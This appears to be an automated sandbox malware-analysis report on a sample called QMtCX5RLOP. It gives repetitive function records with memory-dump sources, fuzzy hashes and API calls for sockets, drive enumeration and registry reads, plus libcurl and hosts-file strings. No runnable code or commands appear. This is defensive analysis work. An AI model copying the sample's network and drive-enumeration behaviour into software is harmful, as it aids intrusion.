                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                                            • API String ID: 3677997916-4129964100
                                                            • Opcode ID: 563c12b586af14dbf32a52b4f5318bb8aaeec9e360efb8f667d54bfa417545c5
                                                            • Instruction ID: e039b9fa26b4bb13c5816616ce2453128beca0a600bb8497feebfce1cbaaac62
                                                            • Opcode Fuzzy Hash: 563c12b586af14dbf32a52b4f5318bb8aaeec9e360efb8f667d54bfa417545c5
                                                            • Instruction Fuzzy Hash: E632B8B59042016BE711AF20EC42A2B77D5AF54318F095834F949A72A3F731ED54C7B3

                                                            Control-flow Graph
                                                            • Graph rendering not preserved; function entry d78b50, graph nodes reference connect, SleepEx, getsockopt
                                                            APIs
                                                            • connect.WS2_32(?,?,00000001), ref: 00D78C2F
                                                            • SleepEx.KERNELBASE(00000000,00000000), ref: 00D78CF3
                                                            • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00D78D0E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: Sleepconnectgetsockopt
                                                            • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                            • API String ID: 1669343778-879669977
                                                            • Opcode ID: bcdaeb1ea2ea424d7e8300c9992e0c41834f7b1d19509e7b6ad2f4b5ba5395da
                                                            • Instruction ID: 87fc1c33eeceb74b51ed213b3395477b86ec2109fb7e2dab76b8065495f6fa4f
                                                            • Opcode Fuzzy Hash: bcdaeb1ea2ea424d7e8300c9992e0c41834f7b1d19509e7b6ad2f4b5ba5395da
                                                            • Instruction Fuzzy Hash: 52B19E70644705AFDB20CF24C889BA6B7A0AF55314F18C62DEC9D5B292EB71EC48D772

                                                            Control-flow Graph
                                                            • Graph rendering not preserved; function entry d42f17, graph nodes reference RegOpenKeyExA, RegEnumKeyExA, RegQueryValueExA, RegCloseKey
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: CloseEnumOpen
                                                            • String ID: d
                                                            • API String ID: 1332880857-2564639436
                                                            • Opcode ID: 4353c058c72a83236056d9cfdb34573ce8125c7af8169bf9953986bcceeca37f
                                                            • Instruction ID: d4b87d874e48494e1804b10a05532045fdbedf04b686773cb2a636ad8c48b212
                                                            • Opcode Fuzzy Hash: 4353c058c72a83236056d9cfdb34573ce8125c7af8169bf9953986bcceeca37f
                                                            • Instruction Fuzzy Hash: 767180B490431A9FDB14DF69C98479EBBF0BF84308F10896DE99897300D7749A88CF92

                                                            Control-flow Graph
                                                            • Graph rendering not preserved; function entry d79290, graph nodes reference WSAIoctl, setsockopt
                                                            APIs
                                                            • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 00D7935C
                                                            • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00D79389
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: Ioctlsetsockopt
                                                            • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                                            • API String ID: 1903391676-2691795271
                                                            • Opcode ID: ac0ae723a0e28ec211a8edcb61657e0260f105654384c93202991a5e9abc8968
                                                            • Instruction ID: fed42dc87dc4d55d6ab1a588a50f5710ae8546eccd5e57dd172e9ebb5cd35ff6
                                                            • Opcode Fuzzy Hash: ac0ae723a0e28ec211a8edcb61657e0260f105654384c93202991a5e9abc8968
                                                            • Instruction Fuzzy Hash: 3451B171604305ABE710DF24C891FAAB7A5FF84718F18C529FD4C9B282E731E991CBA1

                                                            Control-flow Graph
                                                            • Graph rendering not preserved; function entry d476a0, graph nodes reference send
                                                            APIs
                                                            • send.WS2_32(multi.c,?,?,?,00D43D4E,00000000,?,?,00D507BF), ref: 00D476EB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: send
                                                            • String ID: LIMIT %s:%d %s reached memlimit$SEND %s:%d send(%lu) = %ld$multi.c$send
                                                            • API String ID: 2809346765-3388739168
                                                            • Opcode ID: 672c02f76758a833833785ff54d755ba1b0c8e20855dbd88d1e2d4399447f9c1
                                                            • Instruction ID: 6cb1a1034708d408adedad1b0eebcfd17bd85345041b968c99636b8b2b0fcaa7
                                                            • Opcode Fuzzy Hash: 672c02f76758a833833785ff54d755ba1b0c8e20855dbd88d1e2d4399447f9c1
                                                            • Instruction Fuzzy Hash: 09112CF5A193047BE2209B259DC6D773F9CDBC2B68F49090CBC5567342D2619D0086F2

                                                            Control-flow Graph
                                                            • Graph rendering not preserved; function entry d475e0, graph nodes reference socket
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: socket
                                                            • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                                            • API String ID: 98920635-842387772
                                                            • Opcode ID: fd8b947e373db2f22f03f8eb4163af597f1137847b4fbcee2acaf276ef0c45aa
                                                            • Instruction ID: 6a856af3f8ef30b614fb6b4e16b547cd2156b48dfeb7c393108964d6aa50c416
                                                            • Opcode Fuzzy Hash: fd8b947e373db2f22f03f8eb4163af597f1137847b4fbcee2acaf276ef0c45aa
                                                            • Instruction Fuzzy Hash: 191148B6A1025137D7205B2DAC96F9B3F88EF82B74F490919F854A2292D3218C5483F1

                                                            Control-flow Graph
                                                            • Graph rendering not preserved; graph nodes span 6e50030-6e50632 and reference GetLogicalDrives
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A:\$A:\
                                                            • API String ID: 0-1047444362
                                                            • Opcode ID: 2040e1244db9cd70bdcfe749cd19f62dd361e79b1a4e4223df41db001ca7fbfb
                                                            • Instruction ID: 2b55084bc721722453cb6f2868606240fb7dcbc9f19b2f369505524e76a38ad0
                                                            • Opcode Fuzzy Hash: 2040e1244db9cd70bdcfe749cd19f62dd361e79b1a4e4223df41db001ca7fbfb
                                                            • Instruction Fuzzy Hash: F6916FEB24C321BD7382C4552F54AFB6B6DE5D6730332A827FC07D6542E2994E8E50B1

                                                            Control-flow Graph (interactive graph omitted; legend: Executed / Not Executed; the function body calls 6e5004a and GetLogicalDrives)
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A:\$A:\
                                                            • API String ID: 0-1047444362
                                                            • Opcode ID: 3a17a6ced6494aac53919e2855a3f7df64347897bd481ed45a7c29be781d9c28
                                                            • Instruction ID: eda464c9843622e6ad9668429f0c92f9247113528d25048cf6b853adcf210e16
                                                            • Opcode Fuzzy Hash: 3a17a6ced6494aac53919e2855a3f7df64347897bd481ed45a7c29be781d9c28
                                                            • Instruction Fuzzy Hash: 84817FEB14C321BD739284862F14EFB576DE5D6730732A827FC07D6542E2984E8E50B2

                                                            Control-flow Graph (interactive graph omitted; legend: Executed / Not Executed; the function body calls 6e5004a and GetLogicalDrives)
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A:\$A:\
                                                            • API String ID: 0-1047444362
                                                            • Opcode ID: 36a5959f5d89923e9b83d13b3acd6ebd02813661a8a6d67f80e1aa61c7be4e70
                                                            • Instruction ID: f888c5f323899d76d698f5981aad07b5bbcf6c7f5571bc21ffc4d390f09b32ab
                                                            • Opcode Fuzzy Hash: 36a5959f5d89923e9b83d13b3acd6ebd02813661a8a6d67f80e1aa61c7be4e70
                                                            • Instruction Fuzzy Hash: 0A816FEB14C321BD739285862F24EFB5B6DE5D67303329827FC07D6502E2994E8E51B2

                                                            Control-flow Graph (interactive graph omitted; legend: Executed / Not Executed; the function body calls 6e5004a and GetLogicalDrives)
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A:\$A:\
                                                            • API String ID: 0-1047444362
                                                            • Opcode ID: 5b73084879a1eb0cc444e2eb20d42c51e0fbca5f9cdbb57d0ed241d063747f5c
                                                            • Instruction ID: e80c5ba3e038a4981db7fe4dfe3f988ee7633b3de96827d03c5681634eca0693
                                                            • Opcode Fuzzy Hash: 5b73084879a1eb0cc444e2eb20d42c51e0fbca5f9cdbb57d0ed241d063747f5c
                                                            • Instruction Fuzzy Hash: 09817FEB14C321BD739284862F14EFB676DE5D6730732A827FC07D6542E2984E8E50B2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: > km$]jl
                                                            • API String ID: 0-3120149324
                                                            • Opcode ID: 5b771063c7d6eb0c4b1c558c4cc0c1667048bfcd8737bfa31078656ee1d9aea4
                                                            • Instruction ID: c575b96bd548b4dd083766b2cefe1ebf3f6e9ad39e131b825fbd272f88dcaf07
                                                            • Opcode Fuzzy Hash: 5b771063c7d6eb0c4b1c558c4cc0c1667048bfcd8737bfa31078656ee1d9aea4
                                                            • Instruction Fuzzy Hash: 3791F6E714C320BDBBD284455B54AFB276EEFD77307B0942EF807C6642E2940A4A51F1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A:\$A:\
                                                            • API String ID: 0-1047444362
                                                            • Opcode ID: c7ccddf01f62c038f9710198a19ce782f8653895eb41b4cd99f989297b19e9e9
                                                            • Instruction ID: c44671f6e6f20e7438b49fcdc1ed9497d04602ae1bd4861d9bef785797ad161a
                                                            • Opcode Fuzzy Hash: c7ccddf01f62c038f9710198a19ce782f8653895eb41b4cd99f989297b19e9e9
                                                            • Instruction Fuzzy Hash: 9E817FEB24C321BD738284512F64EFB6B6DE5D6730332A467FC07D6502E2994E8E51B2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A:\$A:\
                                                            • API String ID: 0-1047444362
                                                            • Opcode ID: 2b25eaaf80ae468c09895df255cb9eae9b84416f436985cd3c926b6faad8029c
                                                            • Instruction ID: 7e1d635212b7603e226d43974703c50c19e40340d5c21535eba34c0b112bc041
                                                            • Opcode Fuzzy Hash: 2b25eaaf80ae468c09895df255cb9eae9b84416f436985cd3c926b6faad8029c
                                                            • Instruction Fuzzy Hash: FE814DEB24C321BD739285822F24EFB676DE5D6730332A427FC07D6502E2994E8E51B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: A:\$A:\
                                                            • API String ID: 0-1047444362
                                                            • Opcode ID: 3f23fe005a870632a9e0866bcdde2f7fb98baed7eedb802b3ae5a56b6a5ffbbf
                                                            • Instruction ID: eb97b6547ecd0023f8ae19a448b59b210947137643afc60ff763b43f11d6a45f
                                                            • Opcode Fuzzy Hash: 3f23fe005a870632a9e0866bcdde2f7fb98baed7eedb802b3ae5a56b6a5ffbbf
                                                            • Instruction Fuzzy Hash: BE816FEB24C321BD738284562F54EFB6B6DE5D6730332A827FC07D6502E2994E8E51B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: > km$]jl
                                                            • API String ID: 0-3120149324
                                                            • Opcode ID: 4251a6c4f9f939fce51a508a9d961daef242850070570653dab45e019c2d6be1
                                                            • Instruction ID: c068cbd9973478fdaefe69950e29e9ad1b04778731c0464bb8006ede067f0db8
                                                            • Opcode Fuzzy Hash: 4251a6c4f9f939fce51a508a9d961daef242850070570653dab45e019c2d6be1
                                                            • Instruction Fuzzy Hash: AA91F9E714C320BDBBD284456B54AFA276EEFD77307B0942EF807D6A42E3940A4A51F1
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: 525af8c2f1ce20058eb935238eb3e43db3a4f5715952a616553db750ba6268dd
                                                            • Instruction ID: d0251b7d6b6e6a62c2527ce87bb77eee47277235b380b029f4d603fb3613c209
                                                            • Opcode Fuzzy Hash: 525af8c2f1ce20058eb935238eb3e43db3a4f5715952a616553db750ba6268dd
                                                            • Instruction Fuzzy Hash: B4812CEB24D321BD739284822F64EFB576DE5D6730332A427FC07D6502E2994E8E51B2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: > km$]jl
                                                            • API String ID: 0-3120149324
                                                            • Opcode ID: 8876fc75001442332fcff68ff513e4583fc780a206f562bbf7cd61391f1bf7f0
                                                            • Instruction ID: 1375f08cbbf0f409c13528377bf3c745aaf8c0aea6f1ff083f36aab761d4e3fe
                                                            • Opcode Fuzzy Hash: 8876fc75001442332fcff68ff513e4583fc780a206f562bbf7cd61391f1bf7f0
                                                            • Instruction Fuzzy Hash: 5991E6E714C321BDBBC284455B54AFA2B6EEFD67307B0942EF807C6642E2944A4A51F1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: > km$]jl
                                                            • API String ID: 0-3120149324
                                                            • Opcode ID: f139c7b4869c0b3427bd1a6b159feb5fa955a55f049809f592aacb58914441f9
                                                            • Instruction ID: a02c7727d1f87ad0ebf81eab279390351b134f4262d3681631abb826f9e4f89c
                                                            • Opcode Fuzzy Hash: f139c7b4869c0b3427bd1a6b159feb5fa955a55f049809f592aacb58914441f9
                                                            • Instruction Fuzzy Hash: B491F7E714C321BDBBD284456B54AFA276EEFD77307B0A42EF807C6642E3940A4A51F1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: > km$]jl
                                                            • API String ID: 0-3120149324
                                                            • Opcode ID: 9fe3194d1dbab768fbe68c064f9348ea1a14b717c027064bff2b7ae661a2ad42
                                                            • Instruction ID: 9a17730b5c2658252ebde86644ea46947f0f67e0dd8132b1a74de3487cb3871f
                                                            • Opcode Fuzzy Hash: 9fe3194d1dbab768fbe68c064f9348ea1a14b717c027064bff2b7ae661a2ad42
                                                            • Instruction Fuzzy Hash: B381F7E714C321BDBBD284456B54AFB276EEFD7730770942EF807C6A42E3940A4A51B1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e90000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: > km$]jl
                                                            • API String ID: 0-3120149324
                                                            • Opcode ID: 122e019585f0248613829bfa012488a8e9691b4918611046e0bbb42c25ec67c9
                                                            • Instruction ID: 2fbb47af6ec15d30cb4c2cc0f5eae764be0a222ac20beffb41cec0bd29a4ae8e
                                                            • Opcode Fuzzy Hash: 122e019585f0248613829bfa012488a8e9691b4918611046e0bbb42c25ec67c9
                                                            • Instruction Fuzzy Hash: BE81F9E714C321BDBBD284455B54AFB276EEFD77303B0942EF807D6A42E3940A4A51B1
                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 06E50359
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831037798.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogical
                                                            • String ID: A:\$A:\
                                                            • API String ID: 999431828-1047444362
                                                            • Opcode ID: 8b2fdb746eb1db69f33877fd548121f3beeb2520d77bc75849e055d73e5eba23
                                                            • Instruction ID: 910a9af16d0c04a74a3f92d14ce15c538318fe20c45e9f83abf252eb44870c6b
                                                            • Opcode Fuzzy Hash: 8b2fdb746eb1db69f33877fd548121f3beeb2520d77bc75849e055d73e5eba23
                                                            • Instruction Fuzzy Hash: 95712BEB24C321BD729285822F64EFB576DE5D6730332A427FC07D6502E2994E8E51B2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1831109246.0000000006E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
